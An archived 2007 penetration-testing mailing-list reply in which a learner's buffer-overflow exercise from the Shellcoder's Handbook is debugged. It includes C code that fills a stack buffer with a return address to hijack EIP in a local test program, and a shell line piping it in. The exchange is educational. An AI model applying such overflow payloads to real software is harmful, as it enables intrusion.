Penetration Testing mailing list archives

Re: Controling the eip


From: Carl Livitt <carllivitt () yahoo com>
Date: Tue, 15 May 2007 17:01:06 +0100

You'll need to share the source of the vulnerable code as well as the
code you already provided. I believe your code should look something
more like this, too:

#include <stdio.h>

main()
{
    int i=0;
    char stuffing[45]; // one more char allows you to null-terminate
    for (i=0; i<44; i+=4) // <= causes overflow, you need to use <
        *(long *) &stuffing[i] = 0x08048405;
    stuffing[44]='\0'; // remember to null-terminate
    puts(stuffing);
}



You'll notice that Cheers,
Carl

wymerzp () sbu edu wrote:
I am trying to learn about computer security. I picked up the book Shellcoder's Handbook (ISBN: 
0-7645-4468-3)dump-perfect. When I inspect the stack with gdb it over-writes the eip with 0x41414141. 
I then look at the buffer size of the function as well as the address of said function (the purpose being to overflow 
the buffer, control eip to make the function iterate again) and the buffer size is 0x24 (36) and the address is 
0x08048405.
I then write a program to translate the hex into ASCII cleanly to insert into the buffer:

#include <stdio.h>

main()
{
    int i=0;
    char stuffing[44];
    for (i=0; i<=44; i+=4)
    {
      *(long *) &stuffing[i] = 0x08048405;
      puts(stuffing);
    }
}

I then run the program and input the address as ASCII into the buffer as follows: 
bash# (./addresstochar;cat) | ./overflow
which doesn't make the program iterate twice and doesn't change eip on inspection of the stack. What am I doing wrong 
here? I tried to be as thorough as possible; please forgive my verbosity. Thanks, Zach


------------------------------------------------------------------------
This List Sponsored by: Cenzic

Are you using SPI, Watchfire or WhiteHat?
Consider getting clear vision with Cenzic
See HOW Now with our 20/20 program!

http://www.cenzic.com/c/2020
------------------------------------------------------------------------


  


------------------------------------------------------------------------
This List Sponsored by: Cenzic

Are you using SPI, Watchfire or WhiteHat?
Consider getting clear vision with Cenzic
See HOW Now with our 20/20 program!

http://www.cenzic.com/c/2020
------------------------------------------------------------------------


Current thread: